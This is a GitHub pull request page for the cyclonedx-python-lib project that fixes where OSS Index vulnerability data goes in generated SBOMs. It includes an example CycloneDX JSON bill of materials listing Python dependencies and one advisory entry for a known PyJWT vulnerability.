fix: corrected data placement for Vulnerabilities returned from OSS Index when generating an SBOM #94
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
…ndex when generating an SBOM Signed-off-by: Paul Horton <[email protected]>
|
Example SBOM (1.4, JSON) with the changes: {
"$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json",
"bomFormat": "CycloneDX",
"specVersion": "1.4",
"serialNumber": "urn:uuid:ee4a7637-7ebf-4c60-b4db-eb63b9bd19b5",
"version": 1,
"metadata": {
"timestamp": "2022-01-27T08:56:24.359212+00:00",
"tools": [
{
"vendor": "CycloneDX",
"name": "cyclonedx-python-lib",
"version": "1.3.0",
"externalReferences": [
{
"type": "build-system",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/actions"
},
{
"type": "distribution",
"url": "https://pypi.org/project/cyclonedx-python-lib/"
},
{
"type": "documentation",
"url": "https://cyclonedx.github.io/cyclonedx-python-lib/"
},
{
"type": "issue-tracker",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/issues"
},
{
"type": "license",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/LICENSE"
},
{
"type": "release-notes",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib/blob/main/CHANGELOG.md"
},
{
"type": "vcs",
"url": "https://github.com/CycloneDX/cyclonedx-python-lib"
},
{
"type": "website",
"url": "https://cyclonedx.org"
}
]
}
]
},
"components": [
{
"type": "library",
"bom-ref": "ffccc54d-3d7d-4e85-8b05-95bd162cf646",
"author": "Kenneth Reitz",
"name": "certifi",
"version": "2021.10.8",
"licenses": [
{
"expression": "MPL-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "f3d183fd-8bba-4648-a3ed-077b650bdff4",
"author": "Python Packaging Authority",
"name": "setuptools",
"version": "59.6.0",
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "f882d243-2a3d-4326-a21f-42888b4aa04c",
"name": "types-setuptools",
"version": "57.4.7",
"licenses": [
{
"expression": "Apache-2.0 license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "3d2cbe11-75d2-403a-ac11-3e7c1f0ac8cb",
"author": "Hynek Schlawack",
"name": "attrs",
"version": "21.4.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "c57da1eb-d01e-4bd2-96cf-45fbb2ce31ec",
"author": "The pip developers",
"name": "pip",
"version": "21.3.1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "ac67fa1d-775b-4bb6-888f-d3c0e05c572d",
"author": "Donald Stufft and individual contributors",
"name": "packaging",
"version": "21.3",
"licenses": [
{
"expression": "BSD-2-Clause or Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "8ea61715-9854-4d8d-89a8-2ced85f1f933",
"author": "Bernat Gabor",
"name": "virtualenv",
"version": "20.13.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "856e453e-1414-4f54-bfff-e6ddd0063b20",
"author": "Will McGugan",
"name": "rich",
"version": "11.0.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "8c2da1c2-b5df-4b55-af57-bac5c7f89a67",
"author": "Holger Krekel, Bruno Oliveira, Ronny Pfannschmidt, Floris Bruynooghe, Brianna Laugher, Florian Bruhin and others",
"name": "pytest",
"version": "6.2.5",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "e543c7e6-d5e0-459c-ac79-c289a975a677",
"author": "Ned Batchelder and 146 others",
"name": "coverage",
"version": "6.2",
"licenses": [
{
"expression": "Apache 2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "7d1da738-be12-4bd4-9970-303382bbc9b9",
"author": "Markus Siemens",
"name": "tinydb",
"version": "4.6.1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "0d728da6-33dd-4324-b80e-55e01a4793ff",
"author": "Tarek Ziade",
"name": "flake8",
"version": "4.0.1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "148fa5dd-79a0-4cae-9865-8ae2f98c52b4",
"author": "Holger Krekel, Oliver Bestwalter, Bern\u00e1t G\u00e1bor and others",
"name": "tox",
"version": "3.24.5",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "c57fe768-a2d9-438c-b1e4-fec171192d7c",
"author": "Benedikt Schmitt",
"name": "filelock",
"version": "3.4.1",
"licenses": [
{
"expression": "Unlicense"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "13d5e7cb-887b-4d34-803f-f70100be18d7",
"author": "Kim Davies",
"name": "idna",
"version": "3.3",
"licenses": [
{
"expression": "BSD-3-Clause"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "1a209cc9-0caf-4fdc-a0d8-e7c66766c2f0",
"author": "Paul McGuire",
"name": "pyparsing",
"version": "3.0.7",
"licenses": [
{
"expression": "MIT License"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "8277fa4f-30ef-4d0d-b1d9-1a2e009701cd",
"author": "Kenneth Reitz",
"name": "requests",
"version": "2.27.1",
"licenses": [
{
"expression": "Apache 2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "1e7943de-53d6-4627-a6c4-e421a7d10206",
"author": "Georg Brandl",
"name": "Pygments",
"version": "2.11.2",
"licenses": [
{
"expression": "BSD License"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "e0531b38-c0b5-439d-8d4e-c95cc2a0cfa3",
"author": "Johann C. Rocholl",
"name": "pycodestyle",
"version": "2.8.0",
"licenses": [
{
"expression": "Expat license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "abd70860-96f0-40a5-b25f-d992ce55a250",
"author": "A lot of people",
"name": "pyflakes",
"version": "2.4.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "81409b25-1213-4ea1-a802-807e1a6676a4",
"name": "platformdirs",
"version": "2.4.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "46a2ca5e-55d7-4b37-aeb5-8afc2bcf622e",
"author": "Ahmed TAHRI @Ousret",
"name": "charset-normalizer",
"version": "2.0.10",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "92eab689-5abb-4e08-b71d-f8eb2d0ac2b5",
"author": "Steven Springett",
"name": "cyclonedx-bom",
"version": "2.0.1",
"licenses": [
{
"expression": "Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "9888c71c-39d9-4ee7-a319-58bcadeb47da",
"author": "Andrey Petrov",
"name": "urllib3",
"version": "1.26.8",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "db7cc511-a0b4-445f-85ca-fd8d394b5cfc",
"author": "Benjamin Peterson",
"name": "six",
"version": "1.16.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "a887ae3d-7e2c-4be0-9574-7f23a7bba9b6",
"author": "holger krekel, Ronny Pfannschmidt, Benjamin Peterson and others",
"name": "py",
"version": "1.11.0",
"licenses": [
{
"expression": "MIT license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "5c5da76d-8cae-4f2b-83b6-36448b248e12",
"author": "Paul Horton",
"name": "cyclonedx-python-lib",
"version": "1.3.0",
"licenses": [
{
"expression": "Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "6de2741f-3e9a-4f4f-85d2-c76805ba95ee",
"author": "Jos\u00e9 Padilla",
"name": "PyJWT",
"version": "1.3.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "decf14ef-0978-468f-96b8-88f50506b68d",
"author": "Ronny Pfannschmidt, Holger Krekel",
"name": "iniconfig",
"version": "1.1.1",
"licenses": [
{
"expression": "MIT License"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "6d54b14b-6829-43f8-bde1-67b64ebd3993",
"author": "Holger Krekel",
"name": "pluggy",
"version": "1.0.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "76586a8e-5329-46b8-b552-c6307bdd4719",
"author": "Daniel Holth",
"name": "wheel",
"version": "0.37.0",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "84b57982-f8b3-4b7d-b170-a98a5e1d0db0",
"name": "types-toml",
"version": "0.10.3",
"licenses": [
{
"expression": "Apache-2.0 license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "0fa1011e-6548-41d8-a97b-f453432dbcec",
"author": "William Pearson",
"name": "toml",
"version": "0.10.2",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "c2fd0e00-3a42-4cb7-82b2-77d02c215df5",
"author": "the purl authors",
"name": "packageurl-python",
"version": "0.9.6",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "a24ba1e7-68aa-4727-b335-929d246f58df",
"author": "Bibek Kafle <[email protected]>, Roland Shoemaker <[email protected]>",
"name": "commonmark",
"version": "0.9.1",
"licenses": [
{
"expression": "BSD-3-Clause"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "4f418679-331f-418b-8a8b-e6b0a49c43c8",
"author": "Peter Waller (Thanks to Christopher Jones and Stefano Rivera)",
"name": "pyfiglet",
"version": "0.8.post1",
"licenses": [
{
"expression": "MIT"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "cded65f9-94fe-4a69-9e50-a51d29dc0305",
"author": "Ian Cordasco",
"name": "mccabe",
"version": "0.6.1",
"licenses": [
{
"expression": "Expat license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "9ecc003c-5346-4785-9b1d-81ebd29c00fa",
"author": "Donal Mee",
"name": "polling2",
"version": "0.5.0",
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "df04cfb6-bbc1-4465-a1b8-13182941700e",
"author": "Jonathan Hartley",
"name": "colorama",
"version": "0.4.4",
"licenses": [
{
"expression": "BSD"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "dfd61713-a56d-40d5-a064-97d1a3c9d3ad",
"author": "Vinay Sajip",
"name": "distlib",
"version": "0.3.4",
"licenses": [
{
"expression": "Python license"
}
],
"purl": "pkg:pypi/[email protected]"
},
{
"type": "library",
"bom-ref": "3c20d0b7-ac28-49a5-b000-d6113b13f508",
"author": "Paul Horton",
"name": "ossindex-lib",
"version": "0.2.1",
"licenses": [
{
"expression": "Apache-2.0"
}
],
"purl": "pkg:pypi/[email protected]"
}
],
"vulnerabilities": [
{
"bom-ref": "4dc8bf86-e2ee-45b0-881f-bb4f03748b5b",
"id": "4dc8bf86-e2ee-45b0-881f-bb4f03748b5b",
"source": {
"name": "OSS Index",
"url": "https://ossindex.sonatype.org/vulnerability/4dc8bf86-e2ee-45b0-881f-bb4f03748b5b?component-type=pypi&component-name=pyjwt&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration"
},
"references": [
{
"id": "CVE-2017-11424",
"source": {
"name": "OSS Index",
"url": "https://ossindex.sonatype.org/vulnerability/4dc8bf86-e2ee-45b0-881f-bb4f03748b5b?component-type=pypi&component-name=pyjwt&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration"
}
}
],
"ratings": [
{
"source": {
"name": "OSS Index",
"url": "https://ossindex.sonatype.org/vulnerability/4dc8bf86-e2ee-45b0-881f-bb4f03748b5b?component-type=pypi&component-name=pyjwt&utm_source=python-oss-index-lib%400.2.1&utm_medium=integration"
},
"score": 7.5,
"severity": "high",
"method": "CVSSv3",
"vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
"description": "[CVE-2017-11424] Improper Access Control",
"detail": "In PyJWT 1.5.0 and below the `invalid_strings` check in `HMACAlgorithm.prepare_key` does not account for all PEM encoded public keys. Specifically, the PKCS1 PEM encoded format would be allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC KEY-----` which is not accounted for. This enables symmetric/asymmetric key confusion attacks against users using the PKCS1 PEM encoded public keys, which would allow an attacker to craft JWTs from scratch.",
"advisories": [
{
"url": "https://github.com/jpadilla/pyjwt/pull/277"
},
{
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11424"
}
],
"affects": [
{
"ref": "6de2741f-3e9a-4f4f-85d2-c76805ba95ee",
"versions": [
{
"version": "1.3.0",
"status": "affected"
}
]
}
]
}
]
} |
damiencarol
approved these changes
Jan 28, 2022
|
Tested it on a real project. LGTM |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Signed-off-by: Paul Horton [email protected]
This PR:
It relates to the following issue #s:
cc @bhamail / @DarthHater